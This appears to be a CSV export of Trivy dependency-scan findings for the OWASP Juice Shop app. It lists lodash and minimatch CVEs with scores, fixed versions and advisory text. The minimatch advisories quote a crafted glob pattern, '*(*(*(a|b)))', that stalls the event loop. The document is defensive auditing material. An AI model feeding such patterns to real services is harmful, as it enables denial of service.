Shop,,CVE-2025-65945,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],lodash,2.4.2,2026-05-12 17:37:05.159037+00:00,CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L,5.6,,,400,2026-05-12,,,"lodash: Prototype pollution in utilities function NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** >=4.17.11 NEWLINE NEWLINE A prototype pollution vulnerability was found in lodash <4.17.11 where the functions merge, mergeWith, and defaultsDeep can be tricked into adding or modifying properties of Object.prototype. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/sanitize-html/node_modules/lodash/package.json,,True,,False,False,,False,,d4ca616e5a76d86323a9717bd409f6958597382f0e359f05ef08180dcb24304c,118,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.159133+00:00,,,,,0,[],>=4.17.11,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2018-16487 NEWLINE https://github.com/advisories/GHSA-4xc9-xhrj-v574 NEWLINE https://github.com/lodash/lodash/commit/90e6199a161b6445b01454517b40ef65ebecd2ad NEWLINE https://github.com/rubysec/ruby-advisory-db/blob/master/gems/lodash-rails/CVE-2018-16487.yml NEWLINE https://hackerone.com/reports/380873 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2018-16487 NEWLINE https://security.netapp.com/advisory/ntap-20190919-0004 NEWLINE https://security.netapp.com/advisory/ntap-20190919-0004/ NEWLINE https://www.cve.org/CVERecord?id=CVE-2018-16487 NEWLINE https://www.npmjs.com/advisories/782,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2018-16487 Lodash 2.4.2,False,False,,2026-05-12 17:37:05.159050+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2018-16487,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],lodash,2.4.2,2026-05-12 17:37:05.163192+00:00,CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H,7.2,,,94,2026-05-12,,,nodejs-lodash: command injection via template NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 4.17.21 NEWLINE NEWLINE Lodash versions prior to 4.17.21 are vulnerable to Command Injection via the template function. NEWLINE ,False,,,False,,,,False,juice-shop/node_modules/sanitize-html/node_modules/lodash/package.json,,True,,False,False,,False,,2f7e06877557882e061c552cd017dcac8902895673a25d0b0d19beae50eae487,119,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.163249+00:00,,,,,0,[],4.17.21,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2021-23337 NEWLINE https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf NEWLINE https://github.com/advisories/GHSA-35jh-r3h4-6jhm NEWLINE https://github.com/lodash/lodash NEWLINE https://github.com/lodash/lodash/blob/ddfd9b11a0126db2302cb70ec9973b66baec0975/lodash.js NEWLINE https://github.com/lodash/lodash/blob/ddfd9b11a0126db2302cb70ec9973b66baec0975/lodash.js#L14851 NEWLINE https://github.com/lodash/lodash/blob/ddfd9b11a0126db2302cb70ec9973b66baec0975/lodash.js%23L14851 NEWLINE https://github.com/lodash/lodash/commit/3469357cff396a26c363f8c1b5a91dde28ba4b1c NEWLINE https://github.com/rubysec/ruby-advisory-db/blob/master/gems/lodash-rails/CVE-2021-23337.yml NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2021-23337 NEWLINE https://security.netapp.com/advisory/ntap-20210312-0006 NEWLINE https://security.netapp.com/advisory/ntap-20210312-0006/ NEWLINE https://snyk.io/vuln/SNYK-JAVA-ORGFUJIONWEBJARS-1074932 NEWLINE https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-1074930 NEWLINE https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1074928 NEWLINE https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBLODASH-1074931 NEWLINE https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1074929 NEWLINE https://snyk.io/vuln/SNYK-JS-LODASH-1040724 NEWLINE https://www.cve.org/CVERecord?id=CVE-2021-23337 NEWLINE https://www.oracle.com//security-alerts/cpujul2021.html NEWLINE https://www.oracle.com/security-alerts/cpujan2022.html NEWLINE https://www.oracle.com/security-alerts/cpujul2022.html NEWLINE https://www.oracle.com/security-alerts/cpuoct2021.html,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2021-23337 Lodash 2.4.2,False,False,,2026-05-12 17:37:05.163201+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2021-23337,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],lodash,4.17.21,2026-05-12 17:37:05.174988+00:00,CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H,8.1,,,94,2026-05-12,,,"lodash: lodash: Arbitrary code execution via untrusted input in template imports NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 4.18.0 NEWLINE NEWLINE Impact: NEWLINE NEWLINE The fix for CVE-2021-23337 (https://github.com/advisories/GHSA-35jh-r3h4-6jhm) added validation for the variable option in _.template but did not apply the same validation to options.imports key names. Both paths flow into the same Function() constructor sink. NEWLINE NEWLINE When an application passes untrusted input as options.imports key names, an attacker can inject default-parameter expressions that execute arbitrary code at template compilation time. NEWLINE NEWLINE Additionally, _.template uses assignInWith to merge imports, which enumerates inherited properties via for..in. If Object.prototype has been polluted by any other vector, the polluted keys are copied into the imports object and passed to Function(). NEWLINE NEWLINE Patches: NEWLINE NEWLINE Users should upgrade to version 4.18.0. NEWLINE NEWLINE Workarounds: NEWLINE NEWLINE Do not pass untrusted input as key names in options.imports. Only use developer-controlled, static key names. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/lodash/package.json,,True,,False,False,,False,,bd382cfe09c1c6f7eac08c351be1f88a172603a68ffe3cd135b2944910a803f4,122,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.175047+00:00,,,,,0,[],4.18.0,,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:10710 NEWLINE https://access.redhat.com/security/cve/CVE-2026-4800 NEWLINE https://bugzilla.redhat.com/2453496 NEWLINE https://cna.openjsf.org/security-advisories.html NEWLINE https://errata.almalinux.org/9/ALSA-2026-10710.html NEWLINE https://github.com/advisories/GHSA-35jh-r3h4-6jhm NEWLINE https://github.com/lodash/lodash NEWLINE https://github.com/lodash/lodash/commit/3469357cff396a26c363f8c1b5a91dde28ba4b1c NEWLINE https://github.com/lodash/lodash/security/advisories/GHSA-r5fr-rjxr-66jc NEWLINE https://linux.oracle.com/cve/CVE-2026-4800.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-10713.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-4800 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-4800,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-4800 Lodash 4.17.21,False,False,,2026-05-12 17:37:05.174997+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-4800,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],lodash.set,4.3.2,2026-05-12 17:37:05.186199+00:00,CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H,7.4,,,770,2026-05-12,,,nodejs-lodash: prototype pollution in zipObjectDeep function NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** NEWLINE NEWLINE Prototype pollution attack when using _.zipObjectDeep in lodash before 4.17.20. NEWLINE ,False,,,False,,,,False,juice-shop/node_modules/lodash.set/package.json,,False,,False,False,,False,,47ba2c057b6551e0249106994f29d726e04e719214372be4bc031977bf87f882,125,affected,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.186252+00:00,,,,,0,[],,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2020-8203 NEWLINE https://github.com/advisories/GHSA-p6mc-m468-83gw NEWLINE https://github.com/github/advisory-database/pull/2884 NEWLINE https://github.com/lodash/lodash NEWLINE https://github.com/lodash/lodash/commit/c84fe82760fb2d3e03a63379b297a1cc1a2fce12 NEWLINE https://github.com/lodash/lodash/issues/4744 NEWLINE https://github.com/lodash/lodash/issues/4874 NEWLINE https://github.com/lodash/lodash/wiki/Changelog#v41719 NEWLINE https://github.com/rubysec/ruby-advisory-db/blob/master/gems/lodash-rails/CVE-2020-8203.yml NEWLINE https://hackerone.com/reports/712065 NEWLINE https://hackerone.com/reports/864701 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2020-8203 NEWLINE https://security.netapp.com/advisory/ntap-20200724-0006 NEWLINE https://security.netapp.com/advisory/ntap-20200724-0006/ NEWLINE https://web.archive.org/web/20210914001339/https://github.com/lodash/lodash/issues/4744 NEWLINE https://www.cve.org/CVERecord?id=CVE-2020-8203 NEWLINE https://www.npmjs.com/advisories/1523 NEWLINE https://www.oracle.com//security-alerts/cpujul2021.html NEWLINE https://www.oracle.com/security-alerts/cpuApr2021.html NEWLINE https://www.oracle.com/security-alerts/cpuapr2022.html NEWLINE https://www.oracle.com/security-alerts/cpujan2022.html NEWLINE https://www.oracle.com/security-alerts/cpuoct2021.html,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2020-8203 lodash.set 4.3.2,False,False,,2026-05-12 17:37:05.186207+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2020-8203,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.0.5,2026-05-12 17:37:05.201854+00:00,,,CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N,8.7,1333,2026-05-12,,,"minimatch: minimatch: Denial of Service via specially crafted glob patterns NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Versions 10.2.0 and below are vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits. The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever. Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS. This issue has been fixed in version 10.2.1. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/replace/node_modules/minimatch/package.json,,True,,False,False,,False,,0f24ef80e86ea8b63827c6a6957e24e9d2ff668bc9f10ec80cea27d6f0c0c470,129,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.201907+00:00,,,,,0,[],"10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3",,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:7896 NEWLINE https://access.redhat.com/security/cve/CVE-2026-26996 NEWLINE https://bugzilla.redhat.com/2441268 NEWLINE https://bugzilla.redhat.com/2442922 NEWLINE https://bugzilla.redhat.com/2448754 NEWLINE https://bugzilla.redhat.com/2453151 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2441268 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2442922 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2448754 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2453151 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904 NEWLINE https://errata.almalinux.org/9/ALSA-2026-7896.html NEWLINE https://errata.rockylinux.org/RLSA-2026:7896 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5 NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26 NEWLINE https://linux.oracle.com/cve/CVE-2026-26996.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-8339.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-26996 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-26996,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-26996 Minimatch 3.0.5,False,False,,2026-05-12 17:37:05.201861+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-26996,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.0.5,2026-05-12 17:37:05.206241+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,407,2026-05-12,,,"minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, `matchOne()` performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent `**` (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where `n` is the number of path segments and `k` is the number of globstars. With k=11 and n=30, a call to the default `minimatch()` API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior. Any application where an attacker can influence the glob pattern passed to `minimatch()` is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3 fix the issue. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/replace/node_modules/minimatch/package.json,,True,,False,False,,False,,5cef45a8be9893547d272e4cf8535b17e8bc62abe030b8c9576cff86ec727ed2,130,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.206302+00:00,,,,,0,[],"10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3",,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-27903 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748 NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-27903 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-27903,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-27903 Minimatch 3.0.5,False,False,,2026-05-12 17:37:05.206250+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-27903,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.0.5,2026-05-12 17:37:05.210047+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,1333,2026-05-12,,,"minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested `*()` extglobs produce regexps with nested unbounded quantifiers (e.g. `(?:(?:a|b)*)*`), which exhibit catastrophic backtracking in V8. With a 12-byte pattern `*(*(*(a|b)))` and an 18-byte non-matching input, `minimatch()` stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default `minimatch()` API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects `+()` extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/replace/node_modules/minimatch/package.json,,True,,False,False,,False,,767d1deba3cdd58a510c9cf065fce0c693c83f58b6d240d00eedf6981348cfcc,131,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.210100+00:00,,,,,0,[],"10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4",,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:7896 NEWLINE https://access.redhat.com/security/cve/CVE-2026-27904 NEWLINE https://bugzilla.redhat.com/2441268 NEWLINE https://bugzilla.redhat.com/2442922 NEWLINE https://bugzilla.redhat.com/2448754 NEWLINE https://bugzilla.redhat.com/2453151 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2441268 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2442922 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2448754 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2453151 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904 NEWLINE https://errata.almalinux.org/9/ALSA-2026-7896.html NEWLINE https://errata.rockylinux.org/RLSA-2026:7896 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74 NEWLINE https://linux.oracle.com/cve/CVE-2026-27904.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-8339.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-27904 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-27904,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-27904 Minimatch 3.0.5,False,False,,2026-05-12 17:37:05.210055+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-27904,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.0.8,2026-05-12 17:37:05.214213+00:00,,,CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N,8.7,1333,2026-05-12,,,"minimatch: minimatch: Denial of Service via specially crafted glob patterns NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Versions 10.2.0 and below are vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits. The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever. Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS. This issue has been fixed in version 10.2.1. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/grunt/node_modules/minimatch/package.json,,True,,False,False,,False,,412b14ac32e3eb029cf60d5747ee5867f8f5457381144c1179fe8ebd96344297,132,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.214269+00:00,,,,,0,[],"10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3",,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:7896 NEWLINE https://access.redhat.com/security/cve/CVE-2026-26996 NEWLINE https://bugzilla.redhat.com/2441268 NEWLINE https://bugzilla.redhat.com/2442922 NEWLINE https://bugzilla.redhat.com/2448754 NEWLINE https://bugzilla.redhat.com/2453151 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2441268 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2442922 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2448754 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2453151 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904 NEWLINE https://errata.almalinux.org/9/ALSA-2026-7896.html NEWLINE https://errata.rockylinux.org/RLSA-2026:7896 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5 NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26 NEWLINE https://linux.oracle.com/cve/CVE-2026-26996.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-8339.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-26996 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-26996,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-26996 Minimatch 3.0.8,False,False,,2026-05-12 17:37:05.214222+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-26996,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.0.8,2026-05-12 17:37:05.217872+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,407,2026-05-12,,,"minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, `matchOne()` performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent `**` (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where `n` is the number of path segments and `k` is the number of globstars. With k=11 and n=30, a call to the default `minimatch()` API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior. Any application where an attacker can influence the glob pattern passed to `minimatch()` is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3 fix the issue. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/grunt/node_modules/minimatch/package.json,,True,,False,False,,False,,e91de90f77c0bc293f174b50de544e9511f5dc5a1595ae65daabddcb39511991,133,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.217924+00:00,,,,,0,[],"10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3",,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-27903 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748 NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-27903 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-27903,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-27903 Minimatch 3.0.8,False,False,,2026-05-12 17:37:05.217879+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-27903,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.0.8,2026-05-12 17:37:05.222216+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,1333,2026-05-12,,,"minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested `*()` extglobs produce regexps with nested unbounded quantifiers (e.g. `(?:(?:a|b)*)*`), which exhibit catastrophic backtracking in V8. With a 12-byte pattern `*(*(*(a|b)))` and an 18-byte non-matching input, `minimatch()` stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default `minimatch()` API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects `+()` extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/grunt/node_modules/minimatch/package.json,,True,,False,False,,False,,df6ca419c049033555ed15051dfb3d7b58d94de4cf65f957c57f19ef222f278e,134,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.222275+00:00,,,,,0,[],"10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4",,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:7896 NEWLINE https://access.redhat.com/security/cve/CVE-2026-27904 NEWLINE https://bugzilla.redhat.com/2441268 NEWLINE https://bugzilla.redhat.com/2442922 NEWLINE https://bugzilla.redhat.com/2448754 NEWLINE https://bugzilla.redhat.com/2453151 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2441268 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2442922 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2448754 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2453151 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904 NEWLINE https://errata.almalinux.org/9/ALSA-2026-7896.html NEWLINE https://errata.rockylinux.org/RLSA-2026:7896 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74 NEWLINE https://linux.oracle.com/cve/CVE-2026-27904.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-8339.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-27904 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-27904,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-27904 